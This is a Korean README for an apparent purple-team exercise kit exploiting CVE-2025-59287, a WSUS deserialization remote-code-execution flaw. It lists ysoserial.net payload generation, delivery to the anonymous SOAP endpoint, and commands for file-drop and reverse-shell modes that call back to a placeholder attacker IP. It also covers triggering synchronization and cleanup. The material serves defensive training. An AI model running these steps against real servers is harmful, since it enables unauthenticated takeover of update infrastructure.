
WSUS 데이터베이스에 악의적인 역직렬화 페이로드를 주입하여 WSUS에서 인증되지 않은 원격 코드 실행(RCE)을 가능하게 하는 CVE-2025-59287을 시연하는 퍼플 팀 훈련 스크립트입니다.
CVE-2025-59287용 퍼플 팀 연습 스크립트로, Windows Server Update Services (WSUS)의 인증되지 않은 원격 코드 실행 취약점입니다.
승인된 용도로만 사용하십시오. 통제된 연습 환경에서 귀하가 소유하거나 명시적인 서면 허가를 받은 시스템에 대해서만 사용하십시오.
이 취약점은 익명으로 접근 가능한 WSUS SOAP 엔드포인트를 악용하여 악성 역직렬화 페이로드를 WSUS 데이터베이스에 주입합니다. 페이로드는 WSUS 관리 콘솔이 열리거나 동기화가 트리거될 때 실행됩니다.
8530의 WSUS에 네트워크 접근ysoserial\Release\ 폴더에 ysoserial.net 배치 (설정 참조)wsus-cve-2025-59287/
├── 1-check.ps1 # 대상이 취약한지 확인
├── 2-generate.ps1 # 직렬화된 페이로드 블롭 생성
├── 3-deliver.ps1 # WSUS 서버에 페이로드 전달
├── 4-verify.ps1 # 실행 확인 및 정리
├── ysoserial/ # ysoserial.net 릴리즈를 여기에 배치하십시오 (커밋되지 않음)
│ └── Release/
│ └── ysoserial.exe
└── README.md
리포지토리를 클론하거나 다운로드하십시오. 경로가 ysoserial\Release\ysoserial.exe와 일치하도록 ysoserial.net을 추가하십시오.
ysoserial.net 다운로드: https://github.com/pwntester/ysoserial.net/releases/tag/v1.36 기본적으로 Windows Defender가 트리거됩니다.
모든 스크립트를 리포지토리 루트에서 실행하십시오.
.\1-check.ps1 -TargetURL "http://<wsus-ip>:8530"
파일 드롭 (리스너 불필요, 먼저 권장):
.\2-generate.ps1 -Mode filedrop
리버스 셸:
.\2-generate.ps1 -Mode shell -LHost <attacker-ip> -LPort 4444
.\3-deliver.ps1 -TargetURL "http://<wsus-ip>:8530"
WSUS 서버에서 시작 > Windows Server Update Services를 통해 관리 콘솔을 열거나 PowerShell을 통해 동기화를 트리거하십시오:
$wsus = [Microsoft.UpdateServices.Administration.AdminProxy]::GetUpdateServer('localhost', $false, 8530)
$wsus.GetSubscription().StartSynchronization()
실행 확인:
.\4-verify.ps1
모든 아티팩트 확인 및 정리:
.\4-verify.ps1 -Cleanup
공격 박스에서 관리 공유를 통해:
.\4-verify.ps1 -WsusIP <wsus-ip> -Cleanup
정리 후 WSUS 콘솔의 Computers에서 연습 컴퓨터를 제거하십시오.